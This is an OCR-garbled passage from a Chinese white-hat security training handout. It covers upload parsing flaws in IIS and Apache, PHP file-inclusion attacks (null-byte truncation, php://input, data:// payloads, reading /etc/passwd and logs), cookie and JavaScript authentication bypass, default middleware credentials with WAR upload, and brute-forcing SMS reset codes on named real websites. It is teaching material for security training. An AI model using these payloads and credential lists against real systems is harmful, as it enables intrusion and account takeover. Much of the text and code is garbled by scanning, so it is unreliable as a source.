a. gif (105X138) + 





然后 我 们 利用 该 解析 漏洞 构造 URL， 发 现 也 能 够 成 功 访 问 ， 也 能 拿 菜刀 来 连接 。 


360 安 全 浏览 器 7.1 文件 查看 收藏 IR W w 3:5 EC 
© EIC € O9 xinzhibei.com 24 v 图 . als -$--Udi-6G3- 
cC 口 跨 屏 浏览 xinzhibei. com/upload/a. gif/a. php T pue 
E. JFIF (C  $' ”,#(7), 01444’ 9=82<.342 C 21!22222222222222222222222222222222222222222222222222 i* RP D ORETHSPIe jM HRAA RB 
-)Hjo , GRP, 0 0 BITIT (CI ( d mE P n m. 2 w 2 Y W!01AQaq fF” BEY " T 985858 UE all # ^ 
peice dicas i AB7VIX &vd IBWez eVP ”3A 青 @U) $l- fi 2 OP 2a%  — &!làQaq 0 玲 AS s {KEL 
oO 3 Fe l 1 naiivi- U.! oF FEC Nd D ESLA n$j CERIS ( Mes dip N 5qS  SEu$ q?HÉRRÉD (/1 0 uan O\ meta wm 4 3ffh 
T SIC -P 3 


星期 三 2016-07-13 六 月 初 十 
= [E] 让 占 兴 
Pur http: //localhost/subject/upfile/1. php a ?? |127. 0.0. 1 2016-07-11 19;.. z 站 点 类 列 
站】 默认 类 列 
PS http://localhost/subject/fileinclude. php?file=http://l... a ?? |127. 0. 0. 1 2016-07-06 22:.. [ ] Typel 


日 程 提醒 
Pur http: //localhost/subject/fileinclude. php?file=/upfile/... a ?? |127. 0.0. 1 2016-07-06 22:.. 


(—) BSTSHELL X | 


地 址 : [http://xinzhibei. com/upload/a. gif/a. php [a 
配置 : 


备注 :| 


[ms | (RAEI ~ | [2312 -|| 添 和 | 








IIS AT 25 T8] 
IIS 5.x/6.0 主要 存在 两 个 解析 漏洞 ， 第 一 个 是 目录 解析 : 


/a.asp/b.jpg 


其 中 a. E H^ b.jpg ae ara TA b.jpg 会 当做 asp 文件 
来 执行 。 这 个 漏洞 需要 我 们 能 够 创建 目录 。 


第 二 个 是 文件 解析 ， 也 就 是 分 号 截断 : 
a.asp; .jpg 


这 个 文件 的 扩展 名 在 上 传 时 是 jpg ， 但 是 上 传 之 后 ，11S 会 把 它 当 做 asp 文件 来 
解析 o 


另外 ， 在 lIS 中 ， 可 执行 脚本 的 扩展 名 除了 asp 之 外 ， 还 
有 asa ^ cdx ^ cer 。 许 多 网 站 往往 就 过 滤 不 人 全， 一定 要 重视 1 | 


Apache 解析 漏洞 


Apache 的 解析 漏洞 比较 有 意思 ， 它 从 右 到 堪 解析 扩展 名 ， 如 果 碰 到 不 认识 的 扩展 
名 ， 则 继续 往 下 解析 。 比 如 我 们 上 传 a.php.owf.rar ， 它 按照 rar owf php 的 
顺序 解析 扩展 名 ， 但 是 他 不 认识 后 面 两 个 ， 所 以 只 能 将 其 解析 为 php ， 但 在 程序 
中 ， 文 件 的 扩展 名 一 直 是 rar 。 


这 里 的 关键 在 于 ， 如 果 Apache 不 认识 茶 个 扩展 名 ， 但 是 程序 中 没有 过 滤 (me 

如 rar ) ， 我 们 就 可 以 将 1.php 改 成 1.php.rar ， 上 传 之 后 直接 访问 它 。 因 
de PALA 
尝试 。 新 的 扩展 名 会 越 来 越 多 ， 和 程序 由 于 自身 需要 会 对 其 放行 ， 但 是 只 要 Apache 
不 改变 其 解析 规则 ， 这 个 漏洞 就 会 继续 生效 。 


e CH AAT AAR E 
e 新 手指 南 : DVWA-1.94 31 4442 File Upload 


米 斯 特 白 帼 培训 讲义 漏洞 篇 文件 包含 


讲师 : ghOstkey 
整理 : 飞龙 
mit : CC BY-NC-SA 4.0 


x 包含 就 是 将 一 个 文件 包 含 到 自己 的 文件 中 执行 。 它 可 分 为 本 地 包含 和 远程 包 
念 ， 本 地 和 包含 即 和 包含 含 本 地 磁盘 上 的 文件 ， 文件 名 称 是 相对 路 径 或 绝对 路 径 ， 远 程 包 
ea 包含 互联 网 上 的 LIF ^ X TEE AR URL © 


本 地 包含 
比如 我 们 有 一 个 test.txt 文件 ， 仅 仅 调 用 phpinfo 来 测试 : 


«?php phpinfo();?» 


然后 我 们 在 相同 目录 下 放置 一 个 fileinclude.php ， 如 下 : 


«?php 

$file-0$ GET['file']; 

if($file)( 
echo "<center>File:".$file."<br/>Result:</center>"; 
include $file; 


第 一 行 代码 获取 URL 参数 file 的 内 容 。2 ~4 行 首先 判断 $file LEAFS 
不 为 室 ， 输 出 其 内 容 ， 并 将 其 作为 文件 名 称 包 侈 


我 们 将 其 部 署 在 localhost 下 ， 之 后 访 
问 http://localhost/fileinclude.php?file-test.txt ， 会 看 到 phpinfo 的 
输出 。 


漏洞 篇 文件 包含 


Wizard 







PAN phpinfo() x eo 
€ > QC © localhost/fileinclude.php?file-test.txt & ox d 59 








File:test.txt 
Result: 


System |Windows NT ASUSA 6.2 build 9200 (Windows 8 Home Premium Edition) AMD64 
Build Date Mar 5 2014 12:38:50 
Compiler ^ |MSVC11 (Visual C++ 2012) 


cscript /nologo configure.js "--enable-snapshot-build" "--disable-isapi" "--enable- 
debug-pack" "--without-mssql" "--without-pdo-mssql" "--without-pi3web" "--with- 
pdo-oci=C:\php-sdk\oracle\instantclient10\sdk,shared” "--with-oci8=C:\php- 
sdk\oracle\instantclient10\sdk,shared" "--with-oci8-11g=C:\php- 
sdk\oracle\instantclient11\sdk,shared" "--enable-object-out-dir=../obj/" "--enable- 
com-dotnet=shared" "--with-mcrypt=static" "--disable-static-analyze" "--with-pgo" 


Server API Built-in HTTP server 


b 
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我 这 里 之 所 以 用 txt LH’ REAA SRA 73604 RSD o RULER A 
洞 不 一 样 ， 文 件 上 传 漏洞 中 如 果 我 们 上 传 的 文件 不 是 .php 就 执行 不 了 (当然 也 有 
一 些 绕 过 手段 ) ， 但 是 文件 包含 漏洞 中 的 扩展 名 是 任意 的 ， 这 里 我 们 上 传 

了 .txt ， 证 实 有 效 ， 那 么 这 个 ,jpg 也 是 有 效 的 。 


要 注意 ， 如 果 被 包含 的 文件 里 面 没有 PHP 标签， 那么 就 当成 HTML 内 容 如 实 显示 
出 来 。 就 比如 我 们 放 入 之 前 Ay EY top100 .txt 


P4 


Wizard 










pes 
Ls C | © localhost/fileinclude.php?file=top100.txt Gx d & 


PAN localhost/fileinclude.p. x 








File:top100.txt 
Result: 

123456 a123456 123456a 5201314 111111 woaini1314 qq123456 123123 000000 1qaz2wsx 1q2w3e4r 
qwe123 7758521 123qwe a123123 123456aa woaini520 woaini 100200 1314520 woaini123 123321 
q123456 123456789 123456789a 5211314 asd123 a123456789 2123456 asd123456 285201314 
aa123456 zhang123 aptx4869 123123a 1q2w3e4r5t 1qazxsw2 5201314a 1q2w3e aini1314 31415926 
q1w2e3r4 123456qq woaini521 1234qwer a111111 520520 iloveyou abc123 110110 111111a 
123456abc w123456 7758258 123qweasd 159753 qwer1234 a000000 qq123123 zxc123 123654 
abc123456 123456q qq5201314 12345678 000000a 456852 as123456 1314521 112233 521521 
qazwsx123 zxc123456 abcd1234 asdasd 666666 love1314 QAZ123 aaa123 q1w2e3 aaaaaa a123321 
123000 11111111 12qwaszx 5845201314 s123456 nihao123 caonima123 zxcvbnm123 wang123 159357 
1A2B3C4D asdasd123 584520 753951 147258 1123581321 110120 qq1314520 
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为 了 演示 远程 包 念 ， 我 们 需要 将 PHP 配置 文件 中 的 allow url include 设置 
为 on ， 之 后 重启 PHP ° PHP 配置 文件 的 位 置 可 以 在 phpinfo 的 输出 中 寻找 ， 
我 们 搜索 ini BP: 


Loaded CN\php-5.5.10\ph p.ini 


Configuration 
File 





我 这 里 是 C:\php-5.5.10\php.ini ， 你 那里 可 能 有 些 差别 。 我 们 打开 它 ， 搜 
® allow url include ， 会 看 到 下 面 这 些 行 ， 如 果 是 OFF 把 它 改 成 On 。 


; Whether to allow include/require to open URLs (like http:// or 
ftp://) as files. 

; http://php.net/allow-url-include 

allow url include - On 


我 们 需要 将 file 参数 改 为 http://localhost/text.txt ， 可 以 看 到 相同 结 
X e 


技巧 
00 截断 


有 些 程序 会 给 被 包含 内 容 加 一 些 后 组， 比如 如 果 fileinclude.php 是 这 样 。 


«?php 
$file-Q$ GET['file']; 
if($file) { 

$file .= '.php'; 


echo "<center>File:".$file."<br/>Result:</center>"; 
include $file; 


它 后 面 加 了 个 ,php ， 也 就 是 说 ， 如 果 我 们 传 入 file-test 则 是 正常 的 ， 传 
A file-test.txt ， 或 变 成 test.txt.php ， 从 而 包含 失败 。 那 么 我 们 应 该 怎 
Z Z Re, '? 


如 果 PHP 版 本 小 于 5.3， 并 且 magic_quotes_gpc 已 取消 ， 我 们 就 可 以 使 
用 990 来 截断 。 我 们 传 入 file=test.txt%00 ， 就 可 以 实现 包含 。 


IB 4B a A 


./ (RAB) : 当前 目录 

../ : 上 级 目录 

/ : 根 目 录 (Windows 中 为 当前 盘 内 的 根 目 录 ) 
~/ : 用 户 的 主 目 录 


lto > Æ Linux 下， 我们 就 可 以 使 用 file=/etc/passwd AEH A A R A o 
这 里 是 一 些 常见 的 日 志文 件 位 置 : 


e apache-*Linux A & RU 43 
o /etc/httpd/logs/access.log 
o /var/log/httpd/access.1log 
e apache+win2003 A 专 默认 路 径 
o D:\xampp\apache\logs\access.1log 
o D:\xampp\apache\logs\error.log 
e lIS6.0*win2003 RU A & x4 
o C:\WINDOWS\system32\Lognames 
e |IS7.0+win2003 默认 日 志文 件 
o %SystemDrive%\inetpub\logs\Lognames 
e nginx 日 志文 件 
o < 女装 目录 >/1ogS 
o 如 果 安 装 目 录 为 /usr/local/nginx ， 则 为 /usr/local/nginx/logs 
e apachetlinux 默认 配置 文件 
o /etc/httpd/conf/httpd.conf 
o /etc/init.d/httpd 
e IIS6.0+win2003 配置 文件 
o C:/Windows/system32/inetsrv/metabase. xml 
e |IS7.0- WIN 配置 文件 
o C:\Windows\System32\inetsrv\config\applicationHost.config 


PHP 伪 协 议 


允许 远程 包含 的 情况 下 ， 我 们 可 以 使 用 php:// WHW 
如 php://filter/resource-test.txt 可 以 读 取 相同 文件 。 


我 们 还 可 以 加 一 个 过 滤器 让 它 显 示 为 BASE64 编码 格 

AX * php://filter/read-convert.base64-encode/resource-test.txt 。 如 
果 我 们 要 获取 的 文件 里 面 有 不 可 打印 的 字符 ， 或 者 我 们 想 要 获取 代码 的 内 容 ， 可 以 
用 这 种 方式 来 获取 ， 之 后 解码 即 可 。 






Wizard 
FAN localhost/fileinclude.p x W ' 


、 C | © localhost/fileinclude.php?file=php://filter/read=convert.base64-encode/resource=test.txt x. @ & 


File:php://filter/read=convert.base64-encode/resource=test.txt 
Result: 
PD9waHAgcGhwaW5mbygpOz8- 


php://input 可 以 读 取 原始 的 HTTP 正文 内 容 。 如 果 我 们 将 file 设置 
为 php://input ， 并 且 在 HTTP 正文 中 传 入 PHP 代码 ， 例 
如 <?php phpinfo();?» ， 即 可 执行 代码 。 


http://www.bugtest.com/fileinclude/include.php?name=php://input 


Y Ena 


<?php phpinfo();?> 


System Windows NT ROOT-8E3D575027 5.2 build 3790 (Windows Server 2003 Enterprise 








Data URI 


Data URI 的 格式 是 data://text/plain;base64,«base64» ， 同 样 需要 远程 包 

念 。 我 们 首先 把 一 外话 用 base64 编码 ， 得 到 PD9waHAgcGhwaw5mbygp0z8+ ， 然 
后 将 file 设置 

为 data://text/plain;base64,PD9waHAgcGhwaWw5mbygp0z8%2b (注意 URL 编 

A) ， 即 可 执行 代码 。 


漏洞 篇 文件 包含 





Wizard 





FAN phpinfo0 x X 
€ C | © localhost/fileinclude.php?file=data://text/plain;base64, PD9waHAgcGhwaW5mbygp0z8%2b Git dw 58 









File:data://text/plain;ibase64,PD9waHAgcGhwaW5mbygpOz8 
Result: 


System |Windows NT ASUSA 6.2 build 9200 (Windows 8 Home Premium Edition) AMD64 
Build Date Mar 5 2014 12:38:50 
Compiler ^ |MSVC11 (Visual C++ 2012) 


cscript /nologo configure.js "--enable-snapshot-build" "--disable-isapi" "--enable- 
debug-pack" "--without-mssql" "--without-pdo-mssql" "--without-pi3web" "--with- 
pdo-oci=C:\php-sdk\oracle\instantclient10\sdk,shared" "--with-oci8- CAphp- 
sdk\oracle\instantclient10\sdk,shared" "--with-oci8-11g=C:\php- 
sdk\oracle\instantclient11\sdk,shared" "--enable-object-out-dir=../obj/" "--enable- 
com-dotnet=shared" "--with-mcrypt=static" "--disable-static-analyze" "--with-pgo" 


Server API Apache 2.0 Handler 





如 何 挖 据 


首先 对 URL 进行 分 析 ， 看 看 有 是否 和 文件 相关 ， 上 比 
如 dy °。 带 有 文件 相关 的 敏感 名 称 都 可 以 进行 控 
Hh o 


利用 


当 我 们 发 现 了 本 地 包含 漏洞 时 ， 首 先 寻 找 上 传 点 ， 比 如 用 户头 像 上 传 功 能 。 然 后 我 
们 可 以 构造 一 个 纯 文 本 文件 ， 内 容 为 <?php phpinfo();?» ， 并 将 其 命名 
为 xxx.jpg ? 

后 我 们 就 可 以 把 xxx.jpg 上 传 上 去 ， 并 通过 应 用 得 到 它 的 位 置 ， 假 设 
是 /upload/xxx.jpg ， 然 后 我 们 就 可 以 把 file 参数 的 值 改 为 它 。 以 前 面 的 代码 
为 例 ，URL 
是 http://localhost/fileinclude.php?file-/upload/xxx.jpg ° 


如 果 我 们 把 xxx.jpg WARAY RAN — 6] d& > BRT VAI RI SE dE © 
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BHB- 2016-07-08 六 月 初 三 
日 [c] 站 点 类 别 
站 默认 类 列 
[E] Typel 
0j 日 程 提醒 





添加 SHELL 


地 址 : flocalhost/subject/fileinclude. php? file=/upfile/2016. jpg [a 
配置 : 


Sit: 


[Typel =| [azn >| [552512 || 添加 | 
E 





Customize 
13k 7]82014/12/1384b4a956b8cT dcT34 £338 £a05 e407 4390 


IC localhost 


| 读 职 | 星期 三 2016-07-06 六 月 初 三 
127.0.0.1 名 称 时 间 7 日 [c] 站 点 类 别 


[1 默认 关 别 
hpMyAdmi 2016-06-25 01:49:36 0 i — 
GB phpMyAdmin 018-0 01:49:38 [E] fpei 
2016-06-25 01:50:04 Q : 03 日 程 提醒 


2016-06-26 18:19:18 





2016-06-26 22:55:34 
7016-06-28 23:49:54 
2016-06-30 18:11:08 
(C) phpguestbook 2016-07-01 11:42:08 
|X) phpinfo. php 2013-05-09 20:56:36 
Es 1. php 2014-02-27 23:02:20 
自 loveloveNote. txt 2016-06-26 16:38:24 
Fi test. php 2016-06-30 18:02:48 
Fil 1. php 2016-07-01 19:11:00 
Es 5. php 2016-07-01 19:23:20 
自 16-07-01. log 2016-07-01 18:29:14 











再 说 一 下 远程 包含 ， 远 程 包 含 的 条 件 比 较 亲 刻 ， 目 标 网 站 需要 

把 allow url open 给 打开 。 所 以 有 本 地 包含 不 一 定 有 远程 包含 ， 有 远程 包含 一 
定 就 有 本 地 包含 。 但 是 ， 远 程 包 含 的 利用 相对 简单 ， 只 内 要 将 代码 上 传 到 自己 博客 
或 者 任何 能 通过 URL 访问 到 的 地 方 就 可 以 了 。 后 续 步 又 是 一 样 的 。 


? 


MY 3K 


e 新 手指 南 : DVWA-1.9 全 级 别 教程 之 File Inclusion 
e PHP 4? Vi 


漏洞 篇 文件 包含 
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米 斯 特 白 帽 培 训 讲 义 漏洞 篇 越权 


讲师 : ghOstkey 

整理 : 飞龙 

VU : CC BY-NC-SA 4.0 
越权 漏洞 是 Web 应 用 程序 中 一 种 第 见 的 安全 汤 洞 。 它 的 威胁 在 于 一 个 账户 即 可 控 
制 全 站 用 户 数 据 。 当 然 这 些 数据 仅 限 于 存在 漏洞 功能 对 应 的 数据 。 越 权 汤 洞 的 成 因 
主要 是 开发 人 员 在 对 数据 进行 增 、 删 、 改 、 查 时 对 客户 端 请 求 的 数据 过 于 信任 而 遗 
汤 了 权限 的 判定 。 所 以 测试 越权 就 是 和 开发 人 员 拼 细心 的 过 程 。 




















m 
"e us r r ^ 
s ( 越权 漏洞 ) 
id : 1 F 
w hee e 
^ i E —_ 
n eS 
a 
x 
E 
3 p px aL. E 
浏览 器 
hw 
be 
io "C X 
"n E 
—. T" 
. i W 
E " a 
= A 
E 
iy 






COSE. ERIE 


NY 六 
分 


n 


e 水 平 越权 : 权限 不 变 ， 身 份 改 变 
e FERR: 身份 不 变 ， 权 限 改 变 


` 


信息 遍历 


Qu 


«?php 
$id = @$ GET['id']; 
parr = array('1', '2', 'S', '4', ‘5'); 
if(in array($id, $arr, true)) 

echo "用 户 名 : $id 密码 : 123456": 
else 

echo Ee UE 


这 段 代码 首先 从 URL 参数 中 读 取 ID * Z6 5 3,45 ID 比 对 ， 如 果 存 在 则 输出 ID 和 
密码 ， 不 存在 则 报错 。 这 里 ID 是 被 查询 的 信息 ， 假 设 系 统 里 一 共 就 五 个 ID。 由 于 
这 里 不 存在 过 滤 ， 那 么 我 们 可 以 不 绕 过 任何 东西 来 查询 它们 。 


信息 遍历 属于 水 平 越权 ， 因 为 用 户 还 是 首 通 用 户 ， 但 是 身份 变 成 了 其 它 的 首 通 用 
Poo Sih Bla A id=xxx 的 页 面 时 ， 我 们 要 留意 它 ， 因 为 这 里 可 能 和 存在 越权 漏洞 。 
我 们 可 以 手动 测试 ， 将 id 改 为 其 他 值 ， 也 可 以 使 用 Burp 的 爆破 功能 来 测试 。 


隐藏 式 后 台 
一 些 网 站 的 后 人 台 不 存在 任何 用 户 校 验 ， 有 反之 ， 它 会 把 后 台 隐 藏 起 来 。 隐 藏 之 后 ， 公 


开 页 面 上 不 存在 任何 到 后 台 的 链接 ， 但 是 如 果 下 接 输 入 URL， 还 是 可 以 访问 的 。 那 
我 们 就 能 使 用 扫描 器 扫 出 后 台地 址 ， 然 后 直接 访问 。 


隐藏 式 后 台 属 于 垂直 越权 ， 因 为 用 户 的 身份 没有 变 ， 但 是 它 拥有 了 管理 员 权 限 。 


Cookie 统 过 


有 些 时 候 ， 我 们 可 以 绕 过 Cookie ^ JS 代码 的 验证 执行 越权 。 


首先 看 一 段 代码 : 
<!-- pass-cookie.php --> 
«form action="" method="post"> 


<input type="text" name="name"/> 
<input type="password" name="pass"/> 
<input type="submit" Value=" 和 登录 "/> 

</form> 

<?php 

$name-Q$ POST['name']; 

$pass-Q$ POST['pass']; 

if($name--"admin" && $pass--"admin123")( 
setcookie('name', 'admin'); 
header("Location:user.php"); 


这 段 代码 模拟 了 登录 页 面 ， 如 果 账 号 是 admin * A Æ admini23 ， 则 在 
Cookie 中 将 name 设置 为 admin ， 然 后 跳 到 user.php 。 


再 来 看 user.php 


<?php 


if (l!isset($ COOKIE["name"]))( 
header("Location:past-cookie.php"); 


lelsef{ 


$name-$ COOKIE['name']; 
echo "Welcome ".$name; 


这 段 代 码 先 检验 Cookie 中 的 name 
这 段 代码 的 最 大 问题 就 是 验证 极其 不 严密 ， 


， Tg dE WI Seu A > £k» mx 


它 拿 到 name 之 后 并 没有 验证 它 是 谁 ， 


也 没有 使 用 数据 库 来 查询 。 就 像 劲 舞 团 里 面 ， 我 们 按 特 定 的 键 才能 通过 ， 他 这 个 漏 


洞 就 相当 于 ， 游 戏 需 要 我 们 按 下 Z ， 但 是 我 们 按 下 x 也 能 


"Tue 


通过 ， 甚 至 按 任意 键 也 


既然 Cookie 征用 户 可 控 的 ， 那 我 们 就 可 以 伪造 一 个 值 了 ， ee 
BurpSuite。 首 先 在 浏览 器 中 将 代理 设 为 127.0.0.1:8888 


SwitchySharp 选项 升级 i 


à 情景 模 式 


所 有 情景 模式 
burp 


zqt 


* 新 建 情 晨 模 式 


Q 情景 模式 已 删除 。 





A 对 所 有 协议 均 使 用 相同 的 代理 服务 北 


自动 配置 


不 代理 的 地 址 : 


EMA 


ji 
=H 


| 


详细 配置 
Heo 情景 档 式 名 称 (mm 
E 
© 手动 配置 
HTTP 代理 127.0.0.1 端口 |8888 


洲 
> 


保存 


漏洞 篇 越权 





























= 直接 连接 


w burp 
zqt 


如 ”自动 切换 模式 
(FARES 


只 选项 
O 关于 SwitchySharp 


之 后 打开 Burp， 设 置 代理 ， 并 打开 拦截 模式 : 


comparer 





edit 
remove 


new 








forward drop | | action 


假设 我 们 不 经 过 登录 页 面 ， 直 接 访 问 user.php > Burp 中 应 该 能 看 到 拦截 到 的 请 
F: 





141 


漏洞 篇 越权 


burp intruder repeater window about 


target spider | scanner | intruder | repeater sequencer | decoder | comparer | options E 


intercept 


requestto http.//acalhast80 [127.0.0.1] 


raw headers hex 


GET /user.php HTTP/1.1 

Host: localhost 

Proxy-Connection: keep-alive 

Upgqrade-Insecure-Requests: 1 

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOU64)] àppleWebKit/537.36 (KHTML, like Gecko) 
Chrome /51.0.2704.103 Safari/537.368 

hecept: text/html, application/xhtml+xml,application,; xml: q=0.9, imager webp, */*:q=0.68 
Accept-Encoding: gzip, deflate, sdch 

AÀccept-Language: zh-CH,zh:gq-0.8 


bbs tee | matches 





我 们 伪造 Cookie: name=xxx ， 然 后 放行 : 


142 


漏洞 篇 越权 


burp intruder repeater window about 


target | proxy spider | scanner | intruder | repeater sequencer | decoder | comparer | options alerts 


intercept | options 


requestto http." localhnost80 [127.0.0.1] 


raw headers hex 


GET /user.php HTTP/1.1 

Host: localhost 

Proxy-Connection: keep-alive 

Upgqrade-Insecure-Requests: 1 

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOUS64) àppleUWebKit/537.36 (KHTML, like Gecko) 
Chrome /51.0.2704.103 Safari/537.368 

hecept: text/html, application/*xhtml+xml,application,; xml: q=0.9, imager webp, */*:q=0.68 
Accept-Encoding: gzip, deflate, sdch 

Accept-Language: zh-CH,zh:gq-0.89 

Cookie: name-xxx 





bse «matches 


f WNlocalhost/userphp x (i 
€ > C |D localhost/user.php 
n WA @to-md = 实验 吧 D iF Bea D Google 翻译 


Welcome xxx 


成 功 绕 过 了 验证 。 


JS 统 过 


JS 绕 过 则 是 把 所 有 校 验 放 在 前 端 ， 比 如 ， user.php 的 内 容 改 为 : 
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«script» 
function chkcookies() 
{ 
var NameOfCookie="name"; 
var c = document.cookie.indexOf(NameOfCookie-"'-"); 
if (c != -1) 
{ 
return true; 
alert(" A Xm"); 
var Str_htm1L='"<h1> 欢 迎 登 录 本 系统 </h1>"， 
document.write(str html); 


j 


else 


alert(" 请 不 要 非法 访问 " )， 
location.hrefz"past-js.php"; 
} 


return false; 
chkcookies(); 


</script> 


那 我 们 就 不 必 改 什么 Cookie 了 ， 直 接 访问 服务 器 拿 到 纯 文本 ， 之 后 不 解释 JS 就 可 
VA Í œ 


米 斯 特 白 帽 培训 讲义 漏洞 篇 Web 中 间 件 


讲师 : ghOstkey 

整理 : 飞龙 

WU : CC BY-NC-SA 4.0 
简介 
中 间 件 是 一 种 独立 的 系统 软件 或 服务 程 序 ， 分 布 式 应 用 软件 借助 这 种 软件 在 不 同 的 
技术 之 间 共 享 资 源 。 中 间 件 位 于 客户 机 / 服务 器 的 操作 系统 之 上 ， 管 理 计算 机 资源 
和 网 络 通讯 。 是 连接 两 个 独立 应 用 程序 或 独立 系统 的 软件 。 相 连接 的 系统 ， 即 使 它 
们 具有 不 同 的 接口 ， 但 通过 中 间 件 相互 之 间 仍 能 交换 信息 。 执 行 中 间 件 的 一 个 关键 


途径 是 信息 传递 。 通 过 中 间 件 ， 应 用 程序 可 以 工作 于 乡 平台 或 OS 环境 。 (ARB 
科 ) 


RA À 

币 见 的 中 间 件 

这 些 中 间 件 是 Java Web 的 容器 。 都 可 以 上 传 war 包 。 打 包 命 令 : 
jar -cvf <war> <jsp 或 目录 > 

比如 : 


jar -cvf test.war test.jsp 
jar -cvf test.war D:\Project\Test 


上 传 之 后 访问 : 
/< 包 名 >/<jsp 文 件 名 或 路 由 名 > 


比如 包 名 是 test ， 文 件 名 是 test.jsp ， 那 么 访问 /test/test.jsp ° RË 
在 一 个 Servlet 映射 到 了 /test > MAE] /test/test ° 


Tomcat 


漏洞 篇 中 间 件 


| Deploy 


Select WAR file to upload | 选择 文件 | 未 选择 任何 文件 
| Deploy | 





Weblogic 


Administration Console 


BEA WebLogic Server 8.1 





WebLogic Server Administration Console 
登录 以 使 用 WebLogic Server 











HPE: 




















密码 : 


JBoss 


















































| JBoss Application Server 7.1 Profile 
v Server Status Deployments 
Configuration 
JVM Deployments 
Add i 
M Subsystem Metrics T 
Name Runtime Name Enabled En / Disable Remove 
Datasources 
JPA magerx.war magerx.war ¥ | Disable | | Remove | 
T ior 
ransactions wem 
Web 











Y Runtime Operations 











OSGI 




















“ Deployments 


JOnAS 


漏洞 篇 中 间 件 


JOnAS Administration 


Deployment | Upload |) Remove 


aaa | uno 


B: 


= 





WebSphere 


Integrated Solutions Console admin: 欢迎 您 




















视图 : ”所 有 任务 Æ 单元 = network-dicd7feNodeO1Cell, WE = AppSrvO1 
m vem 新 建 应 用 程序 
田 指导 性 活动 | 
— = 新 建 应 用 程序 
| BEBE IEEE EE E SEA B T [EET EP YR ee RE FF o 
(oom 新 建 应 用 程序 实效 新 的 应 用 程序 
应 用 程序 准 型 | | 
BER i " £X: 
IE EE 


回 资源 ] 
weet | * His site ven ater — 


轩 环境 
E 系统 管理 E m 新 建 资 产 
国 用 户 和 组 

田 监视 和 调整 

加 故障 诊断 

EL 服务 集成 











第 见 漏 洞 


gu 
javak Æ 9| 
未 授权 
代码 执行 


in Sue 


Tomcat 


e tomcat:tomcat 
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Weblogic 


weblogic:weblogic 
system:system 
portaladmin:portaladmin 
guest:guest 
weblogic:admini123 
weblogic:weblogici123 


JBoss 


e jboss:jboss 
e admin:admin 
e .. 


JOnAS 


jadmin:jonas 
tomcat:tomcat 
jonas: jonas 


搜索 


默认 端口 


Tomcat : 8080 (Web ` Console) ^... 
WebLogic : 7001 ` 7002 (Web ` Console) ^... 
JBoss : 8080 (Web) ^ 9990 (Console) ^... 
WebSphere : 9080 ` 9443 (Web) ^ 9060 ` 9043 (Console) ^... 
JOnAS : 9000 `... 


使 用 oshadan 或 者 nmap -p 扫描 。 


默认 路 径 


Tomcat: http://<host>:8080/manager/html 

WebLogic: http://<host>:7001/console/ 

JONAS : http://<host>:9000/jonasAdmin/ 

JBoss: http://<host>:9990 

WebSphere: http://<host>:7043/ibm/console/logon.jsp 


4$ inurl: 来 寻找 。 


MY 3K 


e 常见 web 中间 件 拿 shell 


米 斯 特 白 帽 培训 讲义 漏洞 篇 逻辑 漏洞 
讲师 : ghOstkey 
整理 : 飞龙 
It : CC BY-NC-SA 4.0 


~ 


E S R RB RE 
ZER ELARA : 
http://www.118114.cn/reg.jsp 
首先 注册 一 个 账号 ， 然 后 找 回 。 


请 输入 登录 名 ; 44 


请 输入 验证 码 : | 不 区 别 大 小 写 AF 本 W T 





我 们 收 到 的 验证 码 是 六 位 数 。 如 果 网 站 没有 设置 频率 限制 ， 或 者 最 大 尝试 次 数 限制 
的 话 ， 那 我 们 目 然 就 会 想到 可 以 爆破 它 。 


漏洞 篇 逻辑 漏洞 





[ $595 858] 054122 
R 
(5158 316) 916100 


[ 25958 318] 167583 


【号 码 百事 通 】356331 < 一 一 


然后 抓 提 交手 机 验证 码 的 封包 ， 我 们 可 以 看 到 没有 任何 图 片 验 证 码 : 
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漏洞 篇 逻辑 漏洞 


POST /btcms/findPwd3.cmd HTTP/1.1 
Host: www.118114.cn 

Content-Length: 21 

Accept: */* 

Origin: http://www.118114.cn 
X-Requested-\With: XMLHttpRequest 
User-Agent: Mozilla/5.0 (Windows NT 5.1) Apple\Webkit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/5: 
Content-Type: application/x-www-form-urlencoded: charset=UTF-8 

Referer: http://www.118114.cn/findPasswdStep2 jsp 

Accept-Encoding: gzip,deflate sdch 

Accept-Language: zh-CN,zh;q- 0.8 

Cookie: ISESSIONIDZB5D54BD74157B156DB84A7C40AE31058 + 


checkPhoneCode=123456 


发 送 到 Burp 的 Intruder : 





(fj Paveoed Pinitiam 


Lorie Fee potko men porn iod mele tene no e lect rogus The bad Pope detener Fi ohh plebei ae 
x LE ME DIET 


pé tye | Saber "T 


[POST JbtemfimdPad2 cmd HTTF/1. à | awe] 
(HEE nera 1E EL 110n | l 
[Content-Length 71 | ous 
accept: *j* | - 
(Drg hipy wm | 18]14.cn | aid | 
|x Raquasted- vih: xNOUHItpRéequest 一 一 一 一 
| 四 EPE Mace lS D CAMncows NT 3,1) apple Yebiqgt137 38 HTL, Kor Gecko) Chrome aL 4.1 030453 — 
[atari S37 9 

Contan Type: applicant wea form-orlencocded: charge: UTT-8 
|Rafarar- htec) new 1181 14 cn finc atowditepz Ko 

|Arrept- Encoding: gap dellste sdch 

|Accept-Languagac zh-CN thc LE 

Fendi fESSIONIDZBSD^4BD74]579 1 ADR SUE 7 CUOAE T1053 


cher Phone: ca = MERO 








只 给 checkPhoneCode 添加 标志 ， 然 后 将 字典 类 型 设置 为 数字 ， 范 围 
为 000000 ~ 999999 。 然 后 爆破 ， 结 束 后 我 们 发 现 了 一 个 与 众 不 同 的 封包 。 
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漏洞 篇 逻辑 漏洞 


— wv LL Wo ny d sok 


PAEZ EFH "13813477340" RAT RM. SSH A FOB. 


UL Ss B prd : 255] 





SREB - 重 置 密友 


Ht 


任意 手机 号 注 
这 是 某 个 网 站 的 注册 页 面 : 


HEN ES ST 


手机 . or 
u^ End : IIITIIT] 
Sm E : [TITIITIT 





我 们 模拟 注册 一 下 ， 发 现 手机 验证 码 是 四 位 : 


WAGES 
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漏洞 篇 逻辑 漏洞 


(Bi) GH 
为 9801， 请 尽快 完成 验证 。 
oS 





M AN 
然后 抓 注册 的 封包 
ANN a » 
HEEL ILLI lA LASALLLALLLLIILLLLLLIAILZI LALJMLLLLLIILLLL OIL em 2L LZ ee rs ULLA LLLLLZL LI 


assigned to payload positions - see help for full details. 


Attack type: | Sniper 





POST /login/login/register.html HTTP/1.1 
Host: www.wowozhe.com 
Content-Length: 65 

Accept: */* 


